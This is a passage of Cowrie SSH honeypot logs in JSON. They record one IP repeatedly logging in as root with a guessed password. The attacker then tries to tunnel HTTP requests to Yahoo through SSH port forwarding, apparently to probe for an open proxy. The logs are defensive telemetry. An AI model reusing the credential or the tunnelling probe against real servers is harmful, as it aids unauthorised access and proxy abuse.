57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.326608Z","src_ip":"213.209.150.239","session":"ff67f8ee1fff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.609543Z","src_ip":"213.209.150.239","session":"ff67f8ee1fff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26592,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26592","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.667115Z","session":"ff67f8ee1fff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.724254Z","src_ip":"213.209.150.239","session":"ff67f8ee1fff"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":11545,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:11545","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.879130Z","session":"ff67f8ee1fff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.936033Z","src_ip":"213.209.150.239","session":"ff67f8ee1fff"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:38.994391Z","src_ip":"213.209.150.239","session":"ff67f8ee1fff"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5276,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d603c9a367","protocol":"ssh","message":"New connection: 213.209.150.239:5276 (1.2.3.4:22) [session: c2d603c9a367]","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.049823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.050763Z","src_ip":"213.209.150.239","session":"c2d603c9a367"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.107442Z","src_ip":"213.209.150.239","session":"c2d603c9a367"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.389296Z","src_ip":"213.209.150.239","session":"c2d603c9a367"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":24298,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:24298","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.446777Z","session":"c2d603c9a367"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.503375Z","src_ip":"213.209.150.239","session":"c2d603c9a367"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":19663,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:19663","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.658974Z","session":"c2d603c9a367"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.715734Z","src_ip":"213.209.150.239","session":"c2d603c9a367"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.773432Z","src_ip":"213.209.150.239","session":"c2d603c9a367"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5328,"dst_ip":"1.2.3.4","dst_port":22,"session":"254be038771a","protocol":"ssh","message":"New connection: 213.209.150.239:5328 (1.2.3.4:22) [session: 254be038771a]","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.828968Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.829847Z","src_ip":"213.209.150.239","session":"254be038771a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:39.886890Z","src_ip":"213.209.150.239","session":"254be038771a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.169930Z","src_ip":"213.209.150.239","session":"254be038771a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":15462,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15462","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.228861Z","session":"254be038771a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.286317Z","src_ip":"213.209.150.239","session":"254be038771a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3084,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3084","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.443228Z","session":"254be038771a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.500281Z","src_ip":"213.209.150.239","session":"254be038771a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.558414Z","src_ip":"213.209.150.239","session":"254be038771a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5389,"dst_ip":"1.2.3.4","dst_port":22,"session":"8751605e221b","protocol":"ssh","message":"New connection: 213.209.150.239:5389 (1.2.3.4:22) [session: 8751605e221b]","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.604619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.605914Z","src_ip":"213.209.150.239","session":"8751605e221b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.653575Z","src_ip":"213.209.150.239","session":"8751605e221b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.889454Z","src_ip":"213.209.150.239","session":"8751605e221b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":30593,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:30593","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.938036Z","session":"8751605e221b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:40.985661Z","src_ip":"213.209.150.239","session":"8751605e221b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":30351,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:30351","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.121747Z","session":"8751605e221b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.169323Z","src_ip":"213.209.150.239","session":"8751605e221b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.217702Z","src_ip":"213.209.150.239","session":"8751605e221b"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5437,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1e93d29ae05","protocol":"ssh","message":"New connection: 213.209.150.239:5437 (1.2.3.4:22) [session: d1e93d29ae05]","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.263800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.264923Z","src_ip":"213.209.150.239","session":"d1e93d29ae05"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.312061Z","src_ip":"213.209.150.239","session":"d1e93d29ae05"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.547188Z","src_ip":"213.209.150.239","session":"d1e93d29ae05"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11782,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11782","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.595216Z","session":"d1e93d29ae05"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.642473Z","src_ip":"213.209.150.239","session":"d1e93d29ae05"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28051,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28051","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.777523Z","session":"d1e93d29ae05"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.824710Z","src_ip":"213.209.150.239","session":"d1e93d29ae05"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.872512Z","src_ip":"213.209.150.239","session":"d1e93d29ae05"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5490,"dst_ip":"1.2.3.4","dst_port":22,"session":"6068e8bbe3e8","protocol":"ssh","message":"New connection: 213.209.150.239:5490 (1.2.3.4:22) [session: 6068e8bbe3e8]","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.928261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.929100Z","src_ip":"213.209.150.239","session":"6068e8bbe3e8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:59:41.985914Z","src_ip":"213.209.150.239","session":"6068e8bbe3e8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.269027Z","src_ip":"213.209.150.239","session":"6068e8bbe3e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":18736,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:18736","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.326881Z","session":"6068e8bbe3e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.383543Z","src_ip":"213.209.150.239","session":"6068e8bbe3e8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":4934,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:4934","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.539537Z","session":"6068e8bbe3e8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.641845Z","src_ip":"213.209.150.239","session":"6068e8bbe3e8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.699430Z","src_ip":"213.209.150.239","session":"6068e8bbe3e8"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":5547,"dst_ip":"1.2.3.4","dst_port":22,"session":"a409d4e60a25","protocol":"ssh","message":"New connection: 213.209.150.239:5547 (1.2.3.4:22) [session: a409d4e60a25]","sensor":"my-vps","timestamp":"2025-08-26T00:59:42.755139Z"}
